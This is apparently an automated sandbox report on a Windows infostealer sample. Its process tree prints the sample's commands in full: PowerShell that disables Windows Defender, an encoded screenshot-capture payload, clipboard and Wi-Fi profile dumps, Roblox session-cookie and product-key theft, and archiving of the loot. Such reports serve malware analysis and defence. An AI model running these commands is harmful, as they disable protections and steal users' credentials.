Analysis

  • max time kernel
    96s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-01-2025 14:46

General

  • Target

    Program.exe

  • Size

    7.5MB

  • MD5

    a251902a8bbbe4564fbe9bc06325e7a5

  • SHA1

    a4f0ea45b51f99df9dbcdf4d73de1744c12a5dba

  • SHA256

    790c7394a23d59216e1963197316475cd0c6b4f53c3803c65c0f8f407cdd99a9

  • SHA512

    3860976dbf69c2cd9dbcee98de59e6b28aa6ddd55aa17623fa60ed32322c335db3aa6fea3f07ac132b848648920a03ce62ec7fc4ff24957b1e2e50af192077fb

  • SSDEEP

    196608:RkunqZiwfI9jUC2XMvH8zPjweaBpZ0cX9ooccXK7odAxR:VWIH2XgHq+jq+3YoM

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Program.exe
    "C:\Users\Admin\AppData\Local\Temp\Program.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Users\Admin\AppData\Local\Temp\Program.exe
      "C:\Users\Admin\AppData\Local\Temp\Program.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4436
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Program.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1176
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Program.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2160
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3824
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3720
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2476
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:64
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2432
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3484
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4968
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4732
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5100
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4132
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5008
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:4024
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:1456
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:3580
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3672
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:4568
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2080
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:1876
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1332
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1496
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xgqya50s\xgqya50s.cmdline"
                5⤵
                  PID:1064
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF56.tmp" "c:\Users\Admin\AppData\Local\Temp\xgqya50s\CSCEB0E17EB42F048D1A120CDD6433B6941.TMP"
                    6⤵
                      PID:2324
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4636
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3188
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4212
                  • C:\Windows\system32\attrib.exe
                    attrib -r C:\Windows\System32\drivers\etc\hosts
                    4⤵
                    • Drops file in Drivers directory
                    • Views/modifies file attributes
                    PID:2008
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:964
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:772
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                    3⤵
                      PID:1812
                      • C:\Windows\system32\attrib.exe
                        attrib +r C:\Windows\System32\drivers\etc\hosts
                        4⤵
                        • Drops file in Drivers directory
                        • Views/modifies file attributes
                        PID:2676
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:3024
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:2272
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          3⤵
                            PID:3968
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              4⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:840
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:2448
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:1228
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:3144
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:3484
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                    3⤵
                                      PID:4116
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4740
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:4760
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1096
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "getmac"
                                        3⤵
                                          PID:3636
                                          • C:\Windows\system32\getmac.exe
                                            getmac
                                            4⤵
                                              PID:4220
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\MsxVi.zip" *"
                                            3⤵
                                              PID:4024
                                              • C:\Users\Admin\AppData\Local\Temp\_MEI26962\rar.exe
                                                C:\Users\Admin\AppData\Local\Temp\_MEI26962\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\MsxVi.zip" *
                                                4⤵
                                                • Executes dropped EXE
                                                PID:3484
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                              3⤵
                                                PID:768
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic os get Caption
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:264
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                3⤵
                                                  PID:2160
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic computersystem get totalphysicalmemory
                                                    4⤵
                                                      PID:4952
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                    3⤵
                                                      PID:4084
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic csproduct get uuid
                                                        4⤵
                                                          PID:100
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                        3⤵
                                                          PID:2988
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                            4⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:1660
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                          3⤵
                                                            PID:3736
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic path win32_VideoController get name
                                                              4⤵
                                                              • Detects videocard installed
                                                              PID:3280
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                            3⤵
                                                              PID:2484
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3664

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          3KB

                                                          MD5

                                                          8740e7db6a0d290c198447b1f16d5281

                                                          SHA1

                                                          ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                          SHA256

                                                          f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                          SHA512

                                                          d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          2e907f77659a6601fcc408274894da2e

                                                          SHA1

                                                          9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                                          SHA256

